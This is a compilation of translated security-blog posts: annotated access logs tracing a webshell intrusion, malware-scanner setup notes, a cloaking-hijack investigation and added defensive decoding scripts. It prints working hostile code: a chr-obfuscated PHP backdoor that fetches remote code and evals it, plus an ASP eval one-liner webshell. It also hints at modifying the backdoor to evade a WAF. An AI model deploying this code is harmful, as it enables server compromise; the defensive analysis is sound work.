138.128.212.179 - - [15/Jul/2016:17:23:49 +0800] "POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1" 200 785 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"

//from the above, the /Home/Common/uploadFace method has an arbitrary file upload vulnerability. This is where the attacker uploaded the file: the POSTs to it all return 200, whereas a file that did not exist should return 404;

138.128.212.179 - - [15/Jul/2016:17:24:36 +0800] "POST /Public/Uploadify/demo.php HTTP/1.1" 200 119 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:24:40 +0800] "POST /Public/Uploadify/demo.php HTTP/1.1" 200 7 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:24:43 +0800] "POST /Public/Uploadify/demo.php HTTP/1.1" 200 7 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:24:45 +0800] "POST /Public/Uploadify/demo.php HTTP/1.1" 200 7 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:24:45 +0800] "POST /Public/Uploadify/demo.php HTTP/1.1" 200 112 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:24:51 +0800] "POST /Public/Uploadify/demo.php HTTP/1.1" 200 110 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:24:53 +0800] "POST /Public/Uploadify/demo.php HTTP/1.1" 200 13 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [15/Jul/2016:17:24:59 +0800] "POST /Public/Uploadify/demo.php HTTP/1.1" 200 254 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"

//the attacker has successfully uploaded the demo.php backdoor webshell. The earlier uploads had no target directory specified; this one went to a chosen directory, so the upload function's parameters evidently include the upload path and file name;

138.128.212.179 - - [16/Jul/2016:00:14:31 +0800] "GET /Public/Uploadify/demo.php HTTP/1.1" 404 791 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [16/Jul/2016:00:14:31 +0800] "GET /favicon.ico HTTP/1.1" 404 791 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [16/Jul/2016:00:14:43 +0800] "GET /Public/Ueditor/php/upload.php HTTP/1.1" 404 791 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [16/Jul/2016:00:14:44 +0800] "GET /Public/Ueditor/php/ HTTP/1.1" 404 791 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [16/Jul/2016:00:14:46 +0800] "GET /Public/Ueditor/ HTTP/1.1" 404 791 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [16/Jul/2016:00:14:47 +0800] "GET /Public/ HTTP/1.1" 403 273 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"

//in between, there is no telling what the attacker did with the backdoor. /Public/Ueditor/php/upload.php was also requested here and returned 404; either the customer had deleted it, or protection software stopped the attacker's upload from succeeding.

138.128.212.179 - - [16/Jul/2016:00:15:28 +0800] "GET /Home/Login/loginadmin/account/819432780@qq.com/password/e61d6ad4e829e87c9c3791d161f8522c HTTP/1.1" 302 3 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"

//this record shows the attacker logged in with this account. The account should be deleted directly from the admin panel and the IP banned; you could also add the attacker's QQ and have a chat.

138.128.212.179 - - [16/Jul/2016:00:16:04 +0800] "POST /Home/Common/uploadFace HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"

//the attacker's webshell above had been deleted, so they come back to upload again

138.128.212.179 - - [16/Jul/2016:00:16:33 +0800] "POST /Uploads/Pic/2016-07-16/57890c445c548.php HTTP/1.1" 200 32 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"

//the webshell was uploaded successfully

138.128.212.179 - - [16/Jul/2016:00:16:43 +0800] "GET /Uploads/Pic/2016-07-16/57890c445c548.php HTTP/1.1" 200 32 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"

//the attacker starts accessing it; it seems something went wrong, they cannot use it normally?

138.128.212.179 - - [16/Jul/2016:00:17:02 +0800] "POST /Home/Common/uploadFace HTTP/1.1" 200 60 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [16/Jul/2016:00:17:11 +0800] "POST /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1" 405 166 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [16/Jul/2016:00:17:21 +0800] "GET /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1" 200 32 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"

//a .vbak file was uploaded as well; the previous one was probably killed, this one returns 405; the attacker is trying to get around the protection.

138.128.212.179 - - [16/Jul/2016:00:17:46 +0800] "POST /Home/Common/uploadFace HTTP/1.1" 200 57 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [16/Jul/2016:00:17:52 +0800] "GET /Uploads/Pic/2016-07-16/57890caaf344c.1 HTTP/1.1" 200 32 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"

//the extension was changed yet again

138.128.212.179 - - [16/Jul/2016:00:18:45 +0800] "POST /Public/Uploadify/demo.php HTTP/1.1" 404 1331 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"

//accessing demo.php: the page no longer exists

138.128.212.179 - - [16/Jul/2016:00:18:53 +0800] "POST /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1" 405 166 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
138.128.212.179 - - [16/Jul/2016:00:18:58 +0800] "POST /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1" 405 166 "http://www.slbvip.com" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"

//accessing the uploaded webshell returns 405

138.128.212.179 - - [16/Jul/2016:00:23:29 +0800] "GET /Public/kindeditor/php/upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"

//the attacker has found another upload point

138.128.212.179 - - [16/Jul/2016:00:23:51 +0800] "POST /Public/kindeditor/php/upload.php HTTP/1.0" 200 144 "http://slbvip.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
138.128.212.179 - - [16/Jul/2016:00:23:52 +0800] "POST /Public/kindeditor/php/upload.php HTTP/1.0" 200 290 "http://slbvip.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
138.128.212.179 - - [16/Jul/2016:00:23:53 +0800] "POST /Public/kindeditor/php/upload.php HTTP/1.0" 200 1526 "http://slbvip.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
138.128.212.179 - - [16/Jul/2016:00:24:01 +0800] "POST /Public/kindeditor/php/upload.php HTTP/1.0" 200 6514 "http://slbvip.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

//several upload attempts, still without getting through.

138.128.212.179 - - [19/Jul/2016:16:21:46 +0800] "GET /Uploads/146891188257179.jpg HTTP/1.1" 200 150958 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:21:55 +0800] "GET /Uploads/146890768218257.png HTTP/1.1" 200 78289 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:22:01 +0800] "GET /Uploads/146890724044584.png HTTP/1.1" 200 87084 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:22:10 +0800] "GET /Uploads/146890703177801.jpg HTTP/1.1" 200 44256 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:22:16 +0800] "GET /Uploads/146890694154072.png HTTP/1.1" 200 81028 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:22:22 +0800] "GET /Uploads/146890667880773.png HTTP/1.1" 200 69520 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:22:30 +0800] "GET /Uploads/146890663744137.png HTTP/1.1" 200 100128 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:22:37 +0800] "GET /Uploads/146890655699351.png HTTP/1.1" 200 135056 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:22:44 +0800] "GET /Uploads/146890646027724.png HTTP/1.1" 200 103372 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:22:50 +0800] "GET /Uploads/146890637216135.png HTTP/1.1" 200 108561 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:22:55 +0800] "GET /Uploads/146890628924480.png HTTP/1.1" 200 104940 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:23:00 +0800] "GET /Uploads/146890463858741.png HTTP/1.1" 200 82636 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:23:06 +0800] "GET /Uploads/146890438128119.jpg HTTP/1.1" 200 182931 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:23:16 +0800] "GET /Uploads/146890436882884.jpg HTTP/1.1" 200 182931 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:23:32 +0800] "GET /Uploads/146890420781045.png HTTP/1.1" 200 126604 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:23:43 +0800] "GET /Uploads/146890419983679.jpg HTTP/1.1" 200 51284 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:23:53 +0800] "GET /Uploads/146890362678175.png HTTP/1.1" 200 85621 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:24:00 +0800] "GET /Uploads/146890345652557.png HTTP/1.1" 200 83409 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0"
138.128.212.179 - - [19/Jul/2016:16:24:35 +0800] "POST /Public/kindeditor/php/upload.php HTTP/1.0" 200 186 "http://slbvip.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

//the images above were uploaded by the attacker; even if an image contains malicious code it cannot execute, unless a parsing vulnerability is exploited;
//finally the attacker did another scan, and after that there are no more log entries; the back-tracing log analysis ends here.
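The walk-through above boils down to a few repeatable checks: pivot on the attacker's IP, notice scanner user agents that burn through non-existent paths, watch for POSTs to an upload handler followed shortly by requests to a new server-side script under the upload directory, and treat a path that flips between 404 and 200 for the same client as a file being created or removed. As an added example (my own Python, not part of the original write-up), here is a small triage script that applies those four rules to combined-format access log lines. The upload endpoints, upload directory, scanner user-agent prefixes and thresholds are assumptions tuned to this case; the sample lines are constructed with documentation IPs and modelled on the excerpts above.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format as in the excerpts above:
# ip ident user [time] "METHOD path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Hypothetical tuning for this example; set these from the application under review.
UPLOAD_ENDPOINTS = {"/Home/Common/uploadFace", "/Public/kindeditor/php/upload.php"}
UPLOAD_DIR = "/Uploads/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
SCANNER_UA = ("python-requests", "curl/", "sqlmap")
SCAN_404_THRESHOLD = 10
UPLOAD_WINDOW = timedelta(minutes=5)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def triage(lines):
    """Return findings as (ip, rule, detail) tuples, in timestamp order."""
    findings = []
    recs = sorted((r for r in map(parse_line, lines) if r), key=lambda r: r["ts"])
    last_upload = {}                 # ip -> time of last successful POST to an upload handler
    last_status = defaultdict(dict)  # ip -> {path: last status code seen}
    scan_404s = defaultdict(int)     # ip -> 404s from a scanner user agent
    for r in recs:
        ip, path, st = r["ip"], r["path"], r["status"]
        # Rule 1: automated scanner burning through non-existent paths
        if r["ua"].startswith(SCANNER_UA) and st == 404:
            scan_404s[ip] += 1
            if scan_404s[ip] == SCAN_404_THRESHOLD:
                findings.append((ip, "scanner", r["ua"]))
        # Rule 2: remember successful POSTs to upload handlers
        if r["method"] == "POST" and path in UPLOAD_ENDPOINTS and st == 200:
            last_upload[ip] = r["ts"]
        # Rule 3: a server-side script under the upload directory answered 200
        if path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path) and st == 200:
            recent = ip in last_upload and r["ts"] - last_upload[ip] <= UPLOAD_WINDOW
            findings.append((ip, "upload_then_execute" if recent else "script_in_upload_dir", path))
        # Rule 4: the same client saw the same path flip between 404 and 200 (file created or removed)
        prev = last_status[ip].get(path)
        if prev is not None and {prev, st} == {200, 404}:
            findings.append((ip, "status_flip", f"{path} {prev}->{st}"))
        last_status[ip][path] = st
    return findings


# Constructed sample lines (documentation IPs), modelled on the excerpts above.
SCAN_PATHS = ["/1.log", "/phpMyAdmin/", "/pm/", "/phpinfo.php", "/Bak_data/",
              "/Data/", "/db/", "/Db/", "/iProber.php", "/thisistest.txt"]
SAMPLE_LINES = [
    f'203.0.113.7 - - [14/Jul/2016:18:41:{20 + i:02d} +0800] "GET {p} HTTP/1.1" 404 791 "-" "python-requests/2.10.0"'
    for i, p in enumerate(SCAN_PATHS)
] + [
    '203.0.113.7 - - [15/Jul/2016:17:21:55 +0800] "POST /Home/Common/uploadFace HTTP/1.1" 200 59 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Jul/2016:17:22:25 +0800] "POST /Uploads/Pic/2016-07-15/abc123.php HTTP/1.1" 200 51 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Jul/2016:17:24:36 +0800] "POST /Public/Uploadify/demo.php HTTP/1.1" 200 119 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Jul/2016:00:18:45 +0800] "POST /Public/Uploadify/demo.php HTTP/1.1" 404 1331 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Jul/2016:01:03:00 +0800] "POST /Home/Index/tgbzcl HTTP/1.1" 200 86 "http://example.invalid/" "Mozilla/5.0 (iPhone)"',
]

if __name__ == "__main__":
    for ip, rule, detail in triage(SAMPLE_LINES):
        print(f"{ip:15} {rule:22} {detail}")
```

Run against a real access.log the input would be the file's lines; the rules are deliberately cheap so they can be applied to a month of logs in one pass, and the 404-to-200 flip on its own catches both the moment demo.php appeared and the moment it was removed, which is exactly the anchor the write-up needed.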

Analysis of a PHP backdoor

<?php
$password='123';
//----------functional part------------------//
$c="chr";//the string "chr", called as a function below
session_start();

if(empty($_SESSION['PhpCode'])){
$url.=$c(104).$c(116).$c(116).$c(112).$c(58);
$url.=$c(47).$c(47).$c(104).$c(106).$c(105);
$url.=$c(117).$c(46).$c(108).$c(97).$c(47);
$url.=$c(115).$c(99).$c(120).$c(112).$c(46);
$url.=$c(103).$c(105).$c(102);

//$url = chr(104)chr(116)chr(116)chr(112)chr(58)chr(47)chr(47)chr(104)chr(106)chr(105)chr(117)chr(46)chr(108)chr(97)chr(47)chr(115)chr(99)chr(120)chr(112)chr(46)chr(103)chr(105)chr(102)

//$url = http://hjiu.la/scxp.gif

$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);

//$get = chr(102)chr(105)chr(108)chr(101)chr(95)chr(103)chr(101)chr(116)chr(95)chr(99)chr(111)chr(110)chr(116)chr(101)chr(110)chr(116)chr(115)

//$get = file_get_contents

echo  $get($url);

$_SESSION['PhpCode']=$get($url);
}

//echo $url;

$unzip=$c(103).$c(122).$c(105).$c(110);
$unzip.=$c(102).$c(108).$c(97).$c(116).$c(101);
//echo $unzip;//die;

//chr(103).chr(122).chr(105).chr(110)chr(102).chr(108).chr(97).chr(116).chr(101)

//$unzip = gzinflate, i.e. decompression of the fetched payload
@eval($unzip($_SESSION['PhpCode']));

?>

Tonight I helped a customer analyse a backdoor; the analysis is above. I tested it: it does not get past Safedog, and a directly written eval certainly will not, but with some modification it could probably get around Safedog. It is a neat idea: fetching encrypted backdoor code from a remote server to get past the WAF.

Finding malware on Linux with maldet

Install maldet:
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
tar -xvf maldetect-current.tar.gz
cd maldetect-1.5/
./install.sh
Configuration file: /usr/local/maldetect/conf.maldet
maldet --scan-all / # scan all directories
maldet --report 021015-1051.3559 # view the output report of that scan
Linuxidc: http://www.linuxidc.com/Linux/2015-03/115620.htm

Installing Clam AntiVirus on CentOS

cd /etc/yum.repos.d/ # enter the yum repository configuration directory

vi dag.repo # create the repository file
[dag]
name=Dag RPM Repository for RHEL4
baseurl=http://ftp.riken.jp/Linux/dag/redhat/el4/en/$basearch/dag/
enabled=1
gpgcheck=0

yum -y install clamd # install clamd

The installation above sometimes runs into problems. There is another method, which installs the packages the yum command above would pull, one by one, as follows:
Go to http://ftp.riken.jp/Linux/dag/redhat/el4/en/x86_64/dag/RPMS/ and find a suitable version to download. Three packages are needed: two whose names start with clamav (one is the _db package, one is not) and one clamd package; all three must be the same version.
wget http://ftp.riken.jp/Linux/dag/redhat/el4/en/x86_64/dag/RPMS/clamav-db-0.98.1-1.el4.rf.x86_64.rpm
wget http://ftp.riken.jp/Linux/dag/redhat/el4/en/x86_64/dag/RPMS/clamav-0.98.1-1.el4.rf.x86_64.rpm
wget http://ftp.riken.jp/Linux/dag/redhat/el4/en/x86_64/dag/RPMS/clamd-0.98.1-1.el4.rf.x86_64.rpm
Once downloaded, install them one at a time.
rpm -ivh clamav-db-0.98.1-1.el4.rf.x86_64.rpm
rpm -ivh clamav-0.98.1-1.el4.rf.x86_64.rpm
rpm -ivh clamd-0.98.1-1.el4.rf.x86_64.rpm

There is yet another repository that can be used for installation:
[dag]
name=Dag RPM Repository for Red Hat Enterprise Linux
baseurl=http://apt.sw.be/redhat/el$releasever/en/$basearch/dag
enabled=1
gpgcheck=0

yum -y install clamav* && yum -y install clamd*
Different CentOS versions run into different problems, so the above collects several installation methods. Some say ntp also needs to be installed, but I did not install it and had no problems. (yum -y install ntp)
Common commands:
Start: service clamav start
Update the virus database: freshclam, or freshclam --daemon (keep it running as a daemon with &)
Scan a directory: clamscan -r /root/ # clamscan scans the current directory by default
Scan a file: clamscan /root/clamav.zip
Scan and delete infected files: clamscan -r --remove /usr/ # if system files are infected this may delete them and break the system
Save the scan results: clamscan -r / -l /root/hack.log
Start freshclam at boot: echo "/usr/bin/freshclam --daemon" >> /etc/rc.d/rc.local
Option: --no-summary # show only infected files

PHP one-line webshell variants and their encoding

There are many popular PHP one-line webshells, including ones developed by foreign researchers that most people can't read. Today I saw a site infected with a chr one-liner; it was obviously abnormal at a glance. I won't post that specific code, but here is a summary of chr-type one-liner variants and their encoding for ASP and PHP.
<%eval request(chr(65))%>
With this one-liner the China Chopper (菜刀) connection password is A: Chopper simply POSTs arbitrary code in the A parameter. You can see everything Chopper does with Burp Suite, and you could even download Chopper's code and write your own, though there is little point; you would be no better off than decompiling it yourself, other than looking impressive. The numbers inside chr are ASCII codes. An ASCII table is attached, and you can also write a tool to translate them.

chr(9) tab
chr(10) line feed
chr(13) carriage return
chr(13)&chr(10) carriage return + line feed
chr(32) space
chr(34) double quote
chr(39) single quote
chr(33) !
chr(34) "
chr(35) #
chr(36) $
chr(37) %
chr(38) &
chr(39) '
chr(40) (
chr(41) )
chr(42) *
chr(43) +
chr(44) ,
chr(45) -
chr(46) .
chr(47) /
chr(48) 0
chr(49) 1
chr(50) 2
chr(51) 3
chr(52) 4
chr(53) 5
chr(54) 6
chr(55) 7
chr(56) 8
chr(57) 9
chr(58) :
chr(59) ;
chr(60) <
chr(61) =
chr(62) >
chr(63) ?
chr(64) @
chr(65) A
chr(66) B
chr(67) C
chr(68) D
chr(69) E
chr(70) F
chr(71) G
chr(72) H
chr(73) I
chr(74) J
chr(75) K
chr(76) L
chr(77) M
chr(78) N
chr(79) O
chr(80) P
chr(81) Q
chr(82) R
chr(83) S
chr(84) T
chr(85) U
chr(86) V
chr(87) W
chr(88) X
chr(89) Y
chr(90) Z
chr(91) [
chr(92) \
chr(93) ]
chr(94) ^
chr(95) _
chr(96) `
chr(97) a
chr(98) b
chr(99) c
chr(100) d
chr(101) e
chr(102) f
chr(103) g
chr(104) h
chr(105) i
chr(106) j
chr(107) k
chr(108) l
chr(109) m
chr(110) n
chr(111) o
chr(112) p
chr(113) q
chr(114) r
chr(115) s
chr(116) t
chr(117) u
chr(118) v
chr(119) w
chr(120) x
chr(121) y
chr(122) z
chr(123) {
chr(124) |
chr(125) }
More complex passwords than this one can also be translated with the ASCII table.

Many one-line webshells don't look like this at all: they are base64-encoded and decoded inside the file. That kind of encoding just needs to be reversed.
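Both the chr-built backdoor in the PHP analysis above (including its $c="chr"; alias trick) and the chr/base64 one-liners described here can be unwound by a small static decoder. This is an added example written here, not tooling from the original post; the function names are hypothetical and the sample script is constructed in the style of the backdoor above.

```python
import base64
import re

# Hypothetical helper names; the backdoor above is the motivation, the code is added here.
ALIAS_RE = re.compile(r'(\$\w+)\s*=\s*[\'"]chr[\'"]\s*;', re.IGNORECASE)
CHR_RUN_RE = re.compile(r'(?:chr\(\s*\d{1,3}\s*\)\s*[.&]?\s*)+', re.IGNORECASE)
B64_RE = re.compile(r'base64_decode\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)', re.IGNORECASE)
SUSPICIOUS = ("eval", "assert", "execute", "request", "file_get_contents", "gzinflate",
              "base64_decode", "system", "shell_exec", "passthru", "preg_replace")

def resolve_chr_aliases(source):
    """Rewrite $c(104) into chr(104) when the script does $c = "chr"; (the trick in the backdoor above)."""
    for var in ALIAS_RE.findall(source):
        source = source.replace(var + "(", "chr(")
    return source

def decode_chr_runs(source):
    """Replace every run of chr(N) calls, PHP '.' or ASP '&' concatenated, with the string it spells."""
    def spell(m):
        codes = [int(n) for n in re.findall(r'\d{1,3}', m.group(0))]
        return "'" + "".join(chr(c) for c in codes if c < 256) + "'"
    return CHR_RUN_RE.sub(spell, source)

def decode_b64_literals(source):
    """Replace base64_decode('...') on a constant with the decoded text (the 'reverse it' step)."""
    def dec(m):
        try:
            return "'" + base64.b64decode(m.group(1)).decode("utf-8", "replace") + "'"
        except ValueError:
            return m.group(0)
    return B64_RE.sub(dec, source)

def deobfuscate(source):
    """Return (decoded_source, sorted suspicious names seen before or after decoding)."""
    text = decode_b64_literals(decode_chr_runs(resolve_chr_aliases(source)))
    haystack = source + "\n" + text
    found = sorted(w for w in SUSPICIOUS if re.search(r'\b' + w + r'\b', haystack, re.IGNORECASE))
    return text, found

# Constructed sample in the style of the backdoor above (not the original file).
SAMPLE = '''<?php
$c="chr";
$get=$c(102).$c(105).$c(108).$c(101).$c(95).$c(103).$c(101).$c(116).$c(95).$c(99).$c(111).$c(110).$c(116).$c(101).$c(110).$c(116).$c(115);
@eval(base64_decode('cGhwaW5mbygpOw=='));
?>'''

if __name__ == "__main__":
    decoded, hits = deobfuscate(SAMPLE)
    print(decoded)
    print("suspicious:", hits)
```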

An approach to analyzing a web hijack

I have run into search engine cloaking hijacks again. This kind of hijack is quite advanced: it is hard even to tell whether the backend code or the frontend code was tampered with, and intercepting packets through a proxy will not reveal the search-engine redirect. Searching the code turns up nothing, so it has certainly been obfuscated, which makes it hard to find. This time it was a hijacked Ecshop site; here is a summary of the approach.

First, using the Baidu search operator site:domain, I found that every visit arriving via Baidu was redirected, while direct visits to the URL were not. At first I assumed the backend must be making the decision, but I could not find the code; I also suspected frontend JS, but the source is so large that searching from the top would be hopeless, so I started from goods.php. I opened goods.php and placed a breakpoint, die('------exit-----');, right after require(dirname(__FILE__) . '/includes/init.php');. Opening the page via the search engine still showed the hijack, so the problem is inside /includes/init.php. I opened that file and again worked through it from top to bottom with breakpoints. At line 83, require(ROOT_PATH . 'includes/lib_goods.php');, a breakpoint placed before it stops the program cleanly, while one placed after it still shows the hijack, so the included file is the problem.

Persistence paid off: at line 996 of that file I found @print_r($web1);. Printing the $web1 variable outputs a piece of JavaScript; this JS controls the page redirect and checks the referrer to redirect to different hijack sites. The extracted code is as follows:

[packed JavaScript payload in the eval(function(p,a,c,k,e,d){...}(...)) form, omitted]

The analysis shows that this site was hijacked through both the backend and the frontend, with obfuscation layered on top.
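The extracted script uses the common eval(function(p,a,c,k,e,d){...}) packer, whose e() function encodes dictionary indices in base a (digits 0-9, a-z, then A-Z) and substitutes them for the original words. As an added example for analysts, not code from the original post, the following Python inverts that encoding; the sample packed string is constructed and deliberately tiny.

```python
import re
import string

# Digits of the packer's base-a encoding: 0-9, a-z via toString(36), then A-Z via fromCharCode(c+29).
ALPHABET = string.digits + string.ascii_lowercase + string.ascii_uppercase

def decode_index(token, radix):
    """Invert the packer's e(): map an encoded \\w+ token back to its dictionary index."""
    value = 0
    for ch in token:
        digit = ALPHABET.find(ch)
        if digit < 0 or digit >= radix:
            return None                      # not an encoded index in this radix
        value = value * radix + digit
    return value

def unpack(p, a, c, k):
    """Replace each encoded word in p with k[index] when that entry is non-empty,
    mirroring the packer's while(c--) if(k[c]) p = p.replace(...) loop."""
    def restore(m):
        idx = decode_index(m.group(0), a)
        if idx is not None and idx < c and idx < len(k) and k[idx]:
            return k[idx]
        return m.group(0)
    return re.sub(r'\b\w+\b', restore, p)

WRAPPER_RE = re.compile(
    r"\}\('(?P<p>.*)',(?P<a>\d+),(?P<c>\d+),'(?P<k>.*)'\.split\('\|'\),\d+,\{\}\)\)", re.DOTALL)

def unpack_eval_wrapper(js):
    """Pull p, a, c, k out of an eval(function(p,a,c,k,e,d){...}(...)) call and unpack it."""
    m = WRAPPER_RE.search(js)
    if not m:
        return None
    p = re.sub(r"\\(['\"\\])", r"\1", m.group("p"))   # undo JS escaping of quotes/backslashes
    return unpack(p, int(m.group("a")), int(m.group("c")), m.group("k").split("|"))

# Constructed, deliberately tiny packed sample (the real payload is far longer).
PACKED = ("eval(function(p,a,c,k,e,d){/* packer body */}"
          "('0 1=2.3;4(1)',62,5,'var|a|document|title|alert'.split('|'),0,{}))")

if __name__ == "__main__":
    print(unpack_eval_wrapper(PACKED))   # var a=document.title;alert(a)
```

The unpacked text is still obfuscated by the payload's own hex-escaped string table, so a second pass (decoding the \x.. escapes) is usually needed before reading it.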

A hard-to-find hijack on Windows: thumbs.db

Today while browsing my own demo system I noticed something odd: it had been injected with a hidden link, an iframe pointing to an .exe file. It appeared intermittently, and sometimes Google Chrome would automatically download and run it. I tried several sites on the server and they all had the problem, even sites consisting only of HTML pages. Strange; had the Apache environment itself been compromised? I checked Apache, found no third-party modules loaded, and searched for a long time without finding the cause.
